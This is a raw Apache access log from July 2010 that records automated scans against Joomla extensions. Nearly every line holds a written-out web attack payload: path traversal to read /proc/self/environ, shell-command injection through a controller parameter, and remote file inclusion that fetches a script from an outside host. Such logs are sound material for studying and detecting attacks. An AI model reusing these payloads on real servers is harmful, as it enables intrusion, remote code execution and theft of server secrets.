89.212.190.78 - - [26/Jul/2010:08:02:26 +0200] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 559 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
66.187.106.151 - - [26/Jul/2010:08:02:45 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:03:01 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:28 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:28 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:28 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:31 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:03:32 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:09:16 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:09:16 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:09:17 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
112.104.57.22 - - [26/Jul/2010:08:13:38 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:13:42 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:13:43 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
66.187.106.151 - - [26/Jul/2010:08:17:34 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:17:34 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:17:34 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:19:17 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:19:17 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:19:17 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
112.104.57.22 - - [26/Jul/2010:08:19:32 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:33 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:33 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:44 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:44 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:44 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:45 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:45 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:19:45 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
74.81.81.17 - - [26/Jul/2010:08:25:06 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:25:06 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:25:06 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:25:06 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:25:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:25:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
207.46.199.183 - - [26/Jul/2010:08:31:38 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.141.52.11 - - [26/Jul/2010:08:33:12 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:33:12 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:33:12 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:33:17 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:33:17 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:33:17 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:03 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:03 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:03 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:03 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:06 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:34:06 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:38:18 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:38:23 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:38:38 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:41:48 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:41:48 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:43 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:47:56 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:47:56 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:48:21 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:48:26 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
91.212.226.41 - - [26/Jul/2010:08:48:30 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://newark.comites-it.org/logs/error_log/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
91.212.226.41 - - [26/Jul/2010:08:48:30 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
112.104.57.22 - - [26/Jul/2010:08:49:56 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:49:57 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:50:10 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:50:11 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:50:24 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:08:50:25 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
212.92.13.125 - - [26/Jul/2010:08:50:28 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:50:28 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:52:30 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:52:30 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:52:30 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:52:30 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:54:37 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
89.252.20.60 - - [26/Jul/2010:09:06:04 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://moviez.rv.ua/index.php?do=cat&category=flesh_igry" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
89.252.20.60 - - [26/Jul/2010:09:06:04 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
24.137.91.88 - - [26/Jul/2010:09:08:52 +0200] "GET / HTTP/1.1" 200 559 "http://www.designerlove.com/photoalbums.php?action=one&photoid=16642&id=1737" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.141.52.11 - - [26/Jul/2010:09:10:13 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:10:18 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:10:19 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:10:19 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:10:24 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:10:24 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
75.101.240.54 - - [26/Jul/2010:09:36:35 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
75.101.240.54 - - [26/Jul/2010:09:36:36 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
91.208.211.151 - - [26/Jul/2010:09:38:44 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:38:44 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:38:44 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
83.149.110.213 - - [26/Jul/2010:10:16:19 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:19 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:21 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:22 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:23 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:23 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:31 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:16:31 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:35 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:35 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:37 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:37 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:55 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:55 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:08 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:08 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:17 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:17 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:23 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:19:23 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:30:16 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:30:16 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:30:42 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:30:42 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:10:31:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:31:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:31:11 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:31:11 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:32:09 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:32:12 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:34:10 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:34:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:34:31 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:34:31 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:34:58 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:34:59 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:35:09 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:35:09 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:10:35:21 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
